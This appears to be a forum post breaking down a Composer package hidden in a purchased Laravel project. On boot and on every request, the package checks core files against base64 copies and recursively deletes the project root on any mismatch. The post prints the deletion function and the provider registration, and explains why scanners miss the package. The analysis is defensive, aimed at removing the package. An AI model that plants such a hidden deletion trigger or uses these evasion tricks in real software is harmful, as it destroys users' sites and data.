Yeah but it's a bit complicated. I believe
@INDTECH is capable of beating the protection
yeah there is no problem when you give me the path i'm trying to remove this temp function but due to my university exam running i do not have enough time so i'm re-trying to get clean and orignal file so i make it workable.
and here is the whole brakedown of this pakage so i'm goona fix it and cooked it and i hope its going work firstly i shere the brakedown of this bug here:-
What Is It?
A Composer package named
xsoap/init placed inside the vendor/ folder of the Laravel project.
It is disguised as a harmless utility but contains a
fully functional file deletion bomb that recursively deletes your entire Laravel project root — including public_html — the moment it detects any file mismatch.
The developer calls it
"file integrity protection." It is not. It is a
hostage mechanism designed to prevent you from moving, redeploying, or modifying your purchased application.
Package Structure
vendor/xsoap/init/src/
├── Cont/
│ ├── AP.php ← ServiceProvider (entry point, runs on every boot)
│ └── RT.php ← Registers destructive middleware
├── Cri/
│ ├── AL.php ← Contains bo() — the file comparison + delete logic
│ └── MT.php ← Contains rrmdir() — the recursive delete function
├── Enc/
│ └── EN.php ← Decodes base64, returns base_path()
├── Ars/
│ └── Ai.php ← Verifies class existence, builds .tmp file paths
├── Rec/
│ └── DIG.php ← Returns list of core classes to "check"
├── Asp/
│ └── CN.php ← Config file (base64 encoded path values)
├── Draug/
│ └── MD.php ← Middleware: runs Ai::getData() on EVERY web request
└── tmp/
├── A.tmp ← Base64-encoded reference copy of core files
├── C.tmp
├── CP.tmp
├── CPd.tmp
├── E.tmp
├── M.tmp
├── R.tmp
└── WTC.tmp
How It Works — Step by Step
Step 1 — Automatic Trigger on Boot
AP.php is a Laravel ServiceProvider. It is registered in config/app.php and also auto-discovered via composer.json:
json
"extra": {
"laravel": {
"providers": [
"XContains\\XContains\\Cont\\AP",
"XContains\\XContains\\Cont\\RT"
]
}
}
This means
every time Laravel boots, AP::boot() is called automatically — no user interaction needed.
Step 2 — File Integrity "Check" (AL::bo())
AP::boot() immediately calls AL::bo(). This function:
- Gets a list of 8 core PHP classes from DIG::gdg()
- For each class, finds the actual .php file on disk using PHP Reflection
- Finds the corresponding .tmp reference file stored in vendor/xsoap/init/src/tmp/
- Opens both files and compares them line by line
- The .tmp files are base64-encoded copies of what the files "should" look like
Step 3 — Any Mismatch = Delete Everything
If
any of the following is true:
- A file cannot be opened
- Any line doesn't match after base64 decoding
- One file ends before the other
Then it immediately calls:
php
$this->rrmdir(EN::bp());
// Which translates to:
rrmdir(base_path());
Step 4 — rrmdir() — The Actual Bomb
php
protected function rrmdir($dir) {
if (is_dir($dir)) {
$objects = scandir($dir);
foreach ($objects as $object) {
if ($object != "." && $object != "..") {
if (filetype($dir . "/" . $object) == "dir")
$this->rrmdir($dir . "/" . $object); // recursive
else @unlink($dir . "/" . $object); // delete file
}
}
@rmdir($dir); // delete folder
}
}
This is a
fully recursive directory deletion function. It deletes every file and every folder starting from base_path() — which is your Laravel project root. On shared hosting this is typically public_html/ — your
entire website.
Step 5 — Also Fires on Every Web Request
RT.php registers MD.php as a
global web middleware. MD::handle() calls Ai::getData() on every single HTTP request. Ai::getData() also calls rrmdir() if any of the 8 protected classes are missing or tampered with.
So the bomb has
two triggers:
- Laravel application boot
- Every incoming web request
Why VirusTotal Doesn't Catch It
- All sensitive logic is spread across 8+ obfuscated files with meaningless class names (AL, MT, DIG, EN, Ai)
- Reference files are stored as .tmp extensions — not .php — so scanners ignore them
- The actual payload (rrmdir) is a plain PHP function, not a known virus signature
- No network calls, no shell commands — just native PHP file operations
- The package passes a casual code review because each individual file looks harmless
What It Protects (The Other Package)
The .tmp files are base64-encoded copies of classes from
another package — likely named something like strilluminate/ in vendor. That package contains the actual application logic (middleware, routes, blade directives, auth checks). xsoap/init is purely a
watchdog ensuring those files are never modified.
